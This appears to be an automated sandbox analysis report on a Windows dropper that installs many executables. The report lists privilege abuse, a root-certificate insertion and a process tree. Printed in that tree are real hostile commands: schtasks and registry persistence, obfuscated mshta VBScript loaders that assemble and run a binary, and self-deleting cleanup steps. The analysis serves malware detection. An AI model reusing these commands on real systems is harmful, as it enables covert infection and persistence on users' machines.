Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	DownFlSetup110.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	DownFlSetup110.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Cleaner Installation.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2500	schtasks.exe
280	schtasks.exe
2028	schtasks.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2524	Chrome 5.exe
2124	rundll32.exe
2312	services64.exe
2640	msiexec.exe
2640	msiexec.exe
1928	rundll32.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1440	setup_2.tmp

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3064	DownFlSetup110.exe
Token: SeDebugPrivilege	2092	BearVpn 3.exe
Token: SeDebugPrivilege	2868	7.exe
Token: SeDebugPrivilege	2060	taskkill.exe
Token: SeRestorePrivilege	2640	msiexec.exe
Token: SeTakeOwnershipPrivilege	2640	msiexec.exe
Token: SeSecurityPrivilege	2640	msiexec.exe
Token: SeCreateTokenPrivilege	1044	Cleaner Installation.exe
Token: SeAssignPrimaryTokenPrivilege	1044	Cleaner Installation.exe
Token: SeLockMemoryPrivilege	1044	Cleaner Installation.exe
Token: SeIncreaseQuotaPrivilege	1044	Cleaner Installation.exe
Token: SeMachineAccountPrivilege	1044	Cleaner Installation.exe
Token: SeTcbPrivilege	1044	Cleaner Installation.exe
Token: SeSecurityPrivilege	1044	Cleaner Installation.exe
Token: SeTakeOwnershipPrivilege	1044	Cleaner Installation.exe
Token: SeLoadDriverPrivilege	1044	Cleaner Installation.exe
Token: SeSystemProfilePrivilege	1044	Cleaner Installation.exe
Token: SeSystemtimePrivilege	1044	Cleaner Installation.exe
Token: SeProfSingleProcessPrivilege	1044	Cleaner Installation.exe
Token: SeIncBasePriorityPrivilege	1044	Cleaner Installation.exe
Token: SeCreatePagefilePrivilege	1044	Cleaner Installation.exe
Token: SeCreatePermanentPrivilege	1044	Cleaner Installation.exe
Token: SeBackupPrivilege	1044	Cleaner Installation.exe
Token: SeRestorePrivilege	1044	Cleaner Installation.exe
Token: SeShutdownPrivilege	1044	Cleaner Installation.exe
Token: SeDebugPrivilege	1044	Cleaner Installation.exe
Token: SeAuditPrivilege	1044	Cleaner Installation.exe
Token: SeSystemEnvironmentPrivilege	1044	Cleaner Installation.exe
Token: SeChangeNotifyPrivilege	1044	Cleaner Installation.exe
Token: SeRemoteShutdownPrivilege	1044	Cleaner Installation.exe
Token: SeUndockPrivilege	1044	Cleaner Installation.exe
Token: SeSyncAgentPrivilege	1044	Cleaner Installation.exe
Token: SeEnableDelegationPrivilege	1044	Cleaner Installation.exe
Token: SeManageVolumePrivilege	1044	Cleaner Installation.exe
Token: SeImpersonatePrivilege	1044	Cleaner Installation.exe
Token: SeCreateGlobalPrivilege	1044	Cleaner Installation.exe
Token: SeCreateTokenPrivilege	1044	Cleaner Installation.exe
Token: SeAssignPrimaryTokenPrivilege	1044	Cleaner Installation.exe
Token: SeLockMemoryPrivilege	1044	Cleaner Installation.exe
Token: SeIncreaseQuotaPrivilege	1044	Cleaner Installation.exe
Token: SeMachineAccountPrivilege	1044	Cleaner Installation.exe
Token: SeTcbPrivilege	1044	Cleaner Installation.exe
Token: SeSecurityPrivilege	1044	Cleaner Installation.exe
Token: SeTakeOwnershipPrivilege	1044	Cleaner Installation.exe
Token: SeLoadDriverPrivilege	1044	Cleaner Installation.exe
Token: SeSystemProfilePrivilege	1044	Cleaner Installation.exe
Token: SeSystemtimePrivilege	1044	Cleaner Installation.exe
Token: SeProfSingleProcessPrivilege	1044	Cleaner Installation.exe
Token: SeIncBasePriorityPrivilege	1044	Cleaner Installation.exe
Token: SeCreatePagefilePrivilege	1044	Cleaner Installation.exe
Token: SeCreatePermanentPrivilege	1044	Cleaner Installation.exe
Token: SeBackupPrivilege	1044	Cleaner Installation.exe
Token: SeRestorePrivilege	1044	Cleaner Installation.exe
Token: SeShutdownPrivilege	1044	Cleaner Installation.exe
Token: SeDebugPrivilege	1044	Cleaner Installation.exe
Token: SeAuditPrivilege	1044	Cleaner Installation.exe
Token: SeSystemEnvironmentPrivilege	1044	Cleaner Installation.exe
Token: SeChangeNotifyPrivilege	1044	Cleaner Installation.exe
Token: SeRemoteShutdownPrivilege	1044	Cleaner Installation.exe
Token: SeUndockPrivilege	1044	Cleaner Installation.exe
Token: SeSyncAgentPrivilege	1044	Cleaner Installation.exe
Token: SeEnableDelegationPrivilege	1044	Cleaner Installation.exe
Token: SeManageVolumePrivilege	1044	Cleaner Installation.exe
Token: SeImpersonatePrivilege	1044	Cleaner Installation.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1044	Cleaner Installation.exe
1044	Cleaner Installation.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2556 wrote to memory of 2524	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	30
PID 2556 wrote to memory of 2524	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	30
PID 2556 wrote to memory of 2524	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	30
PID 2556 wrote to memory of 2524	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	30
PID 2556 wrote to memory of 1640	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	31
PID 2556 wrote to memory of 1640	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	31
PID 2556 wrote to memory of 1640	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	31
PID 2556 wrote to memory of 1640	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	31
PID 2556 wrote to memory of 3064	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	32
PID 2556 wrote to memory of 3064	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	32
PID 2556 wrote to memory of 3064	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	32
PID 2556 wrote to memory of 3064	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	32
PID 2556 wrote to memory of 3064	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	32
PID 2556 wrote to memory of 3064	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	32
PID 2556 wrote to memory of 3064	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	32
PID 2556 wrote to memory of 2956	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	33
PID 2556 wrote to memory of 2956	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	33
PID 2556 wrote to memory of 2956	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	33
PID 2556 wrote to memory of 2956	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	33
PID 2556 wrote to memory of 2952	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	34
PID 2556 wrote to memory of 2952	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	34
PID 2556 wrote to memory of 2952	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	34
PID 2556 wrote to memory of 2952	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	34
PID 2556 wrote to memory of 2952	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	34
PID 2556 wrote to memory of 2952	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	34
PID 2556 wrote to memory of 2952	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	34
PID 2556 wrote to memory of 3056	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	35
PID 2556 wrote to memory of 3056	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	35
PID 2556 wrote to memory of 3056	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	35
PID 2556 wrote to memory of 3056	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	35
PID 2556 wrote to memory of 3056	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	35
PID 2556 wrote to memory of 3056	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	35
PID 2556 wrote to memory of 3056	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	35
PID 2556 wrote to memory of 2868	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	36
PID 2556 wrote to memory of 2868	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	36
PID 2556 wrote to memory of 2868	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	36
PID 2556 wrote to memory of 2868	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	36
PID 2556 wrote to memory of 1036	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	37
PID 2556 wrote to memory of 1036	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	37
PID 2556 wrote to memory of 1036	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	37
PID 2556 wrote to memory of 1036	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	37
PID 2556 wrote to memory of 1036	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	37
PID 2556 wrote to memory of 1036	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	37
PID 2556 wrote to memory of 1036	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	37
PID 2556 wrote to memory of 1724	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	38
PID 2556 wrote to memory of 1724	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	38
PID 2556 wrote to memory of 1724	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	38
PID 2556 wrote to memory of 1724	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	38
PID 2556 wrote to memory of 1724	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	38
PID 2556 wrote to memory of 1724	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	38
PID 2556 wrote to memory of 1724	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	38
PID 2556 wrote to memory of 3008	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	39
PID 2556 wrote to memory of 3008	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	39
PID 2556 wrote to memory of 3008	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	39
PID 2556 wrote to memory of 3008	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	39
PID 2556 wrote to memory of 2000	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	40
PID 2556 wrote to memory of 2000	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	40
PID 2556 wrote to memory of 2000	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	40
PID 2556 wrote to memory of 2000	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	40
PID 2556 wrote to memory of 1044	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	42
PID 2556 wrote to memory of 1044	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	42
PID 2556 wrote to memory of 1044	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	42
PID 2556 wrote to memory of 1044	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	42
PID 2556 wrote to memory of 1044	2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe	42

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2556
- C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
  "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:2524
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
    3⤵
    PID:2864
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:280
- - C:\Users\Admin\AppData\Roaming\services64.exe
    "C:\Users\Admin\AppData\Roaming\services64.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2312
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
      4⤵
      PID:2736
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2028
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
      4⤵
      Executes dropped EXE
      PID:2684
- C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe
  "C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1640
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 1044
    3⤵
    - Loads dropped DLL
    - Program crash
    PID:1924
- C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
  "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies system certificate store
  - Suspicious use of AdjustPrivilegeToken
  PID:3064
- C:\Users\Admin\AppData\Local\Temp\inst001.exe
  "C:\Users\Admin\AppData\Local\Temp\inst001.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2956
- C:\Users\Admin\AppData\Local\Temp\install.exe
  "C:\Users\Admin\AppData\Local\Temp\install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2952
- - C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
    "C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:2248
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\
      4⤵
      System Location Discovery: System Language Discovery
      PID:2664
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1656
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe" /F
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:2500
- C:\Users\Admin\AppData\Local\Temp\setup.exe
  "C:\Users\Admin\AppData\Local\Temp\setup.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:3056
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{atcn-sTXCl-CVJ5-URQ2r}\78224359952.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:804
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{atcn-sTXCl-CVJ5-URQ2r}\96758969264.exe" /mix
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2880
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{atcn-sTXCl-CVJ5-URQ2r}\83973314234.exe" /mix
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1108
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1724
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "setup.exe" /f
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:2252
- C:\Users\Admin\AppData\Local\Temp\7.exe
  "C:\Users\Admin\AppData\Local\Temp\7.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2868
- C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
  "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1036
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2184
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:1580
    - - C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE
        
        ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2232
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))
        6⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2820
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2956
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0, trUE ) )
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1976
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6&cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2024
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" eCHo "
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2880
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2912
        
        C:\Windows\SysWOW64\control.exe
        
        control ..\kZ_AmsXL.6G
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1560
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
        9⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1928
        
        C:\Windows\system32\RunDll32.exe
        
        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
        10⤵
        
        PID:1436
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G
        11⤵
        Blocklisted process makes network request
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2124
        
        C:\Users\Admin\AppData\Local\Temp\f7873aa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\f7873aa.exe"
        12⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1548
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 600
        13⤵
        Program crash
        
        PID:1704
        
